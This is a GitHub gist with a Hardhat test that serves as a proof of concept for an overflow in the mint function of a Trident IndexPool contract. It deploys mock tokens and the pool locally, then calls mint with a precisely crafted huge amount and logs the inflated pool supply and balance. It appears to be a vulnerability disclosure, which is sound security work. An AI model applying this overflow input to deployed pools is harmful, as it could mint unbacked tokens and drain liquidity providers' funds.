-
-
Save x9453/7a423aef223c1b86442206e3248d318c to your computer and use it in GitHub Desktop.
PoC of overflow in the mint function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const { expect } = require("chai"); | |
const { ethers } = require("hardhat"); | |
function e2w(x) { | |
return ethers.utils.parseEther(x); | |
} | |
function w2e(x) { | |
return ethers.utils.formatEther(x); | |
} | |
function scale(x, d) { | |
return ethers.BigNumber.from(x).mul(ethers.BigNumber.from('10').pow(d)); | |
} | |
weth = "" | |
usdt = "" | |
usdc = "" | |
async function print_record(pool) { | |
record = await pool.records(usdt.address); | |
console.log('usdt reserve:', w2e(record[0])); | |
record = await pool.records(usdc.address); | |
console.log('usdc record:', w2e(record[0])); | |
console.log('---'); | |
} | |
// what each ERC20 is deployed with | |
const ERCDeployAmount = e2w('1000000') | |
// alice's usdt/usdc balance | |
const aliceUSDTBalance = e2w('10000'); | |
const aliceUSDCBalance = e2w('10000'); | |
// token weights passed into the pool | |
const tokenWeights = [e2w('10'), e2w('10')]; | |
// pool swap fee | |
const poolSwapFee = scale('1', '13'); | |
describe("IndexPool", function () { | |
it("shw test", async function () { | |
const ERC20 = await ethers.getContractFactory("ERC20Mock"); | |
const Bento = await ethers.getContractFactory("BentoBoxV1"); | |
const Deployer = await ethers.getContractFactory("MasterDeployer"); | |
const PoolFactory = await ethers.getContractFactory("IndexPoolFactory"); | |
const SwapRouter = await ethers.getContractFactory("TridentRouter"); | |
Pool = await ethers.getContractFactory("IndexPool"); | |
[alice, feeTo] = await ethers.getSigners(); | |
// deploy erc20's | |
weth = await ERC20.deploy("WETH", "WETH", ERCDeployAmount); | |
await weth.deployed(); | |
usdt = await ERC20.deploy("USDT", "USDT", ERCDeployAmount); | |
await usdt.deployed(); | |
usdc = await ERC20.deploy("USDC", "USDC", ERCDeployAmount); | |
await usdc.deployed(); | |
bento = await Bento.deploy(weth.address); | |
await bento.deployed(); | |
masterDeployer = await Deployer.deploy(17, feeTo.address, bento.address); | |
await masterDeployer.deployed(); | |
tridentPoolFactory = await PoolFactory.deploy(masterDeployer.address); | |
await tridentPoolFactory.deployed(); | |
router = await SwapRouter.deploy( | |
bento.address, | |
masterDeployer.address, | |
weth.address | |
); | |
await router.deployed(); | |
// Whitelist pool factory in master deployer | |
await masterDeployer.addToWhitelist(tridentPoolFactory.address); | |
// Whitelist Router on BentoBox | |
await bento.whitelistMasterContract(router.address, true); | |
// Approve BentoBox token deposits | |
await usdc.approve(bento.address, ERCDeployAmount); | |
await usdt.approve(bento.address, ERCDeployAmount); | |
// Make BentoBox token deposits | |
await bento.deposit( | |
usdc.address, | |
alice.address, | |
alice.address, | |
ERCDeployAmount, | |
0 | |
); | |
await bento.deposit( | |
usdt.address, | |
alice.address, | |
alice.address, | |
ERCDeployAmount, | |
0 | |
); | |
// Approve Router to spend 'alice' BentoBox tokens | |
await bento.setMasterContractApproval( | |
alice.address, | |
router.address, | |
true, | |
"0", | |
"0x0000000000000000000000000000000000000000000000000000000000000000", | |
"0x0000000000000000000000000000000000000000000000000000000000000000" | |
); | |
const tokens = | |
usdt.address.toUpperCase() < usdc.address.toUpperCase() | |
? [usdt.address, usdc.address] | |
: [usdc.address, usdt.address]; | |
// address[], uint256[], uint256 | |
const deployData = ethers.utils.defaultAbiCoder.encode( | |
["address[]", "uint256[]", "uint256"], | |
[tokens, tokenWeights, poolSwapFee] | |
); | |
let tx = await ( | |
await masterDeployer.deployPool(tridentPoolFactory.address, deployData) | |
).wait(); | |
const pool = await Pool.attach(tx.events[1].args.pool); | |
initial = e2w('1'); | |
await bento.transfer( | |
usdt.address, | |
alice.address, | |
pool.address, | |
initial | |
); | |
await bento.transfer( | |
usdc.address, | |
alice.address, | |
pool.address, | |
initial | |
); | |
console.log('=== start ==='); | |
await print_record(pool); | |
console.log('pool total supply:', w2e(await pool.totalSupply())); | |
await pool.mint( | |
ethers.utils.defaultAbiCoder.encode( | |
["address", "uint256"], | |
[alice.address, e2w("100")] | |
) | |
); | |
console.log('=== after fisrt mint ===') | |
await print_record(pool); | |
console.log('pool total supply:', w2e(await pool.totalSupply())); | |
toMint = e2w("265845599156983174580761412056068915000") | |
//toMint = e2w("265845599156983174580761412056068914999") // fails | |
await pool.mint( | |
ethers.utils.defaultAbiCoder.encode( | |
["address", "uint256"], | |
[alice.address, toMint] | |
) | |
); | |
console.log('=== after second mint ===') | |
await print_record(pool); | |
console.log('pool total supply:', w2e(await pool.totalSupply())); | |
console.log('alice balance:', w2e(await pool.balanceOf(alice.address))); | |
}); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment